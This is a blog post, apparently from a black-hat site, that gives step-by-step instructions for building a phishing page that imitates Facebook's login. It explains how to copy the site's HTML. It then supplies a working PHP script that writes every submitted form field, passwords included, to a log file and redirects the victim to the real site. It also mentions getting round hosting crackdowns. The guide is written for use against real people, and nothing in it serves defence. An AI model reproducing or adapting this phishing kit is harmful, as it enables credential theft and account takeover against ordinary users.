A scam page is a fake webpage. e.g. login to a popular website, online bank login and etc. depending on what it is. scam pages are used by spammers to collect data on people who get scammed. detecting the scam page is simple if you are technology-oriented. but most common users can’t detect scam page. this is a big problem in the www. some companies are developing software to combat scams or phishing scams today we will know How to Code Scam Page.
How to Creat Scam page?
Recently I have come across many guides about creating phishing pages. Although the principles behind each guide are similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy for that we writing How to Code Scam Page.
Step 1Download the HTML Index of the Target Webpage
To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible , lets know How to Code Scam Page
Navigate to Your Webpage
In this tutorial, I am going to phish Facebook.

View the Source of the Webpage.
Depending on your browser, there may be different methods. Normally it is done by right-clicking the site and clicking “View Source”. I have done that on my browser and windows should come out similar to this make sure to research on that more How to Code Scam Page

On the box to the right is the source of the website. Which leads on to the next step:
Downloading and Saving the Source Code
Select the box, and copy-paste everything in the box to a txt document. Use Notepad on windows, and a simple text editing program if you are not using windows. (Don’t use programs like Word or Pages because it is really slow). After you have done that, click “Save As” or whatever option that allows you to save that document. On Notepad it should look like this:

Change “Save as type” to All Files and change the encoding to Unicode.
After that, name the document “index.html”, obviously without the speech marks.

Congratulations! You have finished the first step of the tutorial!
Step 2 Creating a PHP File for Password Harvesting
The PHP file is basically the tool that harvests the users password in this scenario. There are several ways you can create this PHP if you have some programming knowledge, but if you don’t, just copy my exemplar PHP.
<?php
header (‘Location: facebook.com‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
exit;
?>
read more here : https://blackhatpakistan.net/how-to-code-scam-page/
No comments:
Post a Comment